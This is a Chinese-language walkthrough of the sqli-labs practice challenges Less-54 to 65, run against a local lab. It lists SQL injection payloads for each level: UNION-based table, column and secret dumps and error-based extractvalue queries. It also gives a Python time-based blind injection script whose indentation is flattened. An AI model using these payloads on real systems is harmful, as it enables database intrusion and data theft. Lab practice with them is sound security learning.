Less-54
从这关开始就进入Challenges了,觉得这种模式还是有点新奇的,限制了尝试次数。而且也像CTF一样有要求一个目标的secret key了。这关总共给了10次机会。
1. 127.0.0.1/sqli-labs-master/Less-54/?id=1' and 1=1--+
2. 127.0.0.1/sqli-labs-master/Less-54/?id=1' and 1=2--+
3. 127.0.0.1/sqli-labs-master/Less-54/?id=1' order by 1--+
4. 127.0.0.1/sqli-labs-master/Less-54/?id=1' order by 2--+
5. 127.0.0.1/sqli-labs-master/Less-54/?id=1' order by 3--+
6. 127.0.0.1/sqli-labs-master/Less-54/?id=1' order by 4--+
7. 127.0.0.1/sqli-labs-master/Less-54/?id=-1' union select 1,2,3--+
8. 127.0.0.1/sqli-labs-master/Less-54/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
9. 127.0.0.1/sqli-labs-master/Less-54/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='cyyiapy75g'--+
10. 127.0.0.1/sqli-labs-master/Less-54/?id=-1' union select 1,2,group_concat(sessid,0x3a,secret_FBHX) from cyyiapy75g--+
Less-55
1. 127.0.0.1/sqli-labs-master/Less-55/?id=1' and 1=1--+
2. 127.0.0.1/sqli-labs-master/Less-55/?id=1') and 1=1--+
3. 127.0.0.1/sqli-labs-master/Less-55/?id=1) and 1=1--+
4. 127.0.0.1/sqli-labs-master/Less-55/?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
5. 127.0.0.1/sqli-labs-master/Less-55/?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='5q25g5zis5'--+
6. 127.0.0.1/sqli-labs-master/Less-55/?id=-1) union select 1,2,(select secret_8TNV from 5q25g5zis5)--+
Less-56
1. 127.0.0.1/sqli-labs-master/Less-56/?id=1' and 1=1--+
2. 127.0.0.1/sqli-labs-master/Less-56/?id=1') and 1=1--+
3. 127.0.0.1/sqli-labs-master/Less-56/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
4. 127.0.0.1/sqli-labs-master/Less-56/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='yozuj3pzjl'--+
5. 127.0.0.1/sqli-labs-master/Less-56/?id=-1') union select 1,2,(select secret_UBWQ from yozuj3pzjl)--+
Less-56
经简单判断可以得出闭合方式为’),其余步骤与前面几关雷同。
Less-57
经简单判断可以得出闭合方式为”,其余步骤与前面几关雷同。
Less-58
经过测试可以知道闭合为’,但是union注入并不能得出数据,故在这里我们考虑报错注入。
127.0.0.1/sqli-labs-master/Less-58/?id=1' and extractvalue(1,concat(1,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--+
http://127.0.0.1/sqli-labs-master/Less-58/?id=1' and extractvalue(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='n7dnsulx9w')))--+
http://127.0.0.1/sqli-labs-master/Less-58/?id=1' and extractvalue(1,concat(1,(select group_concat(secret_WMWC) from n7dnsulx9w)))--+
Less-59
这道题只是将闭合由’改成没有闭合而已。其余步骤模仿Less-58即可。
Less-60
这道题是闭合改成”),其余步骤模仿Less-58。
Less-61
先传入个id=1’试试,发现有如下报错:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'')) LIMIT 0,1' at line 1
可以得知闭合方式为’)),接下来的步骤便模仿Less-58。
Less-62
由限制次数130就可以知道是盲注了。脚本如下:
import requests
import time
url = "http://127.0.0.1/sqli-labs-master/Less-62/"
result = ''
string1 = '0123456789abcdefghijklmnopqrstuvwxyz'
for i in range(1,11):
for j in string1:
payload = "1') and if((substr((select group_concat(table_name)from(information_schema.tables)where(table_schema)='challenges'),{},1)>'{}'),sleep(1),sleep(2))#".format(i,j)
data = {"id":payload}
time1 = time.time()
headers = {"Cookie":"challenge=b1d69d7f6eceef8700a1dc70160ec0ff"}
r = requests.get(url,params = data,headers = headers)
time2 = time.time()
time3 = time2 - time1
if time3 > 3:
result += j
print result
break
只是这样是超过130次的了,我在这里还没有使用二分法破解,但是即使使用二分法也是不能满足要求的。等技术大佬解答吧。
Less-63
和Less-62是一样的,只是闭合方式由’)改成’而已。
Less-64
和Less-62是一样的,只是闭合方式由’)改成))而已。
Less-65
和Less-62是一样的,只是闭合方式由’)改成)而已。
